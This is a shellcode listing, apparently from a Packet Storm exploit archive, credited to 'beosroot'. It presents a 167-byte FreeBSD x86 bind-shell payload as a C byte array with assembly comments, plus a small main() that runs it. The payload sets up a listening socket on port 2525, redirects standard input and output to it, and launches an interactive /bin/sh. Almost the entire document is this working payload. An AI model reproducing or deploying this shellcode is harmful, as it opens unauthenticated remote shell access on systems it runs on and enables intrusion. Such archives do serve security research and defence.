167 bytes small BSD x86 bindshell shellcode that spawns on port 2525.
5a447749a7e712642b891f138acd1fadf52e144f89d056165174522ccc32ba06/*
-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
* AUTHOR : beosroot
* OS : BSDx86 (Tested on FreeBSD)
* EMAIL : beosroot@hotmail.fr
beosroot@null.net
* GR33TZ To : joseph-h, str0ke, MHIDO55,.....
*/
const char shellcode[] =
"\x6a\x00" // push $0x0
"\x6a\x01" // push $0x1
"\x6a\x02" // push $0x2
"\x50" // push %eax
"\x6a\x61" // push $0x61
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x50" // push %eax
"\x6a\x00" // push $0x0
"\x6a\x00" // push $0x0
"\x6a\x00" // push $0x0
"\x6a\x00" // push $0x0
"\x68\x10\x02\x09\xdd" // push $0xdd090210
"\x89\xe0" // mov %esp,%eax
"\x6a\x10" // push $0x10
"\x50" // push %eax
"\xff\x74\x24\x1c" // pushl 0x1c %esp
"\x50" // push %eax
"\x6a\x68" // push $0x68
"\x58" // pop $eax
"\xcd\x80" // int $0x80
"\x6a\x01" // push $0x1
"\xff\x74\x24\x28" // pushl 0x28 %esp
"\x50" // push %eax
"\x6a\x6a" // push $0x6a
"\x58" // pop $eax
"\xcd\x80" // int $0x80
"\x83\xec\x10" // sub $0x10,$esp
"\x6a\x10" // push $0x10
"\x8d\x44\x24\x04" // lea 0x4%esp,%eax
"\x89\xe1" // mov %esp,%ecx
"\x51" // push %ecx
"\x50" // push %eax
"\xff\x74\x24\x4c" // pushl 0x4c %esp
"\x50" // push %eax
"\x6a\x1e" // push %0x1e
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x50" // push %eax
"\xff\x74\x24\x58" // pushl 0x58 %esp
"\x50" // push %eax
"\x6a\x06" // push $0x6
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x6a\x00" // push $0x0
"\xff\x74\x24\x0c" // pushl 0xc %esp
"\x50" // push %eax
"\x6a\x5a" // push $0x5a
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x6a\x01" // push $0x1
"\xff\x74\x24\x18" // pushl 0x18 %esp
"\x50" // push %eax
"\x6a\x5a" // push $0x5a
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x6a\x02" // push $0x2
"\xff\x74\x24\x24" // pushl 0x24 %esp
"\x50" // push %eax
"\x6a\x5a" // push $0x5a
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x68\x73\x68\x00\x00" // push $0x6873
"\x89\xe0" // mov %esp,%eax
"\x68\x2d\x69\x00\x00" // push $0x692d
"\x89\xe1" // mov %esp,%ecx
"\x6a\x00" // push $0x0
"\x51" // push %ecx
"\x50" // push %eax
"\x68\x2f\x73\x68\x00" // push $0x68732f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe0" // mov %esp,%eax
"\x8d\x4c\x24\x08" // lea 0x8 %esp,%ecx
"\x6a\x00" // push $0x0
"\x51" // push %ecx
"\x50" // push %eax
"\x50" // push %eax
"\x6a\x3b" // push $0x3b
"\x58" // pop %eax
"\xcd\x80"; // int $0x80
int main() {
void (*hell)() = (void *)shellcode;
return (*(int(*)())shellcode)();
}
// the end o.O
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed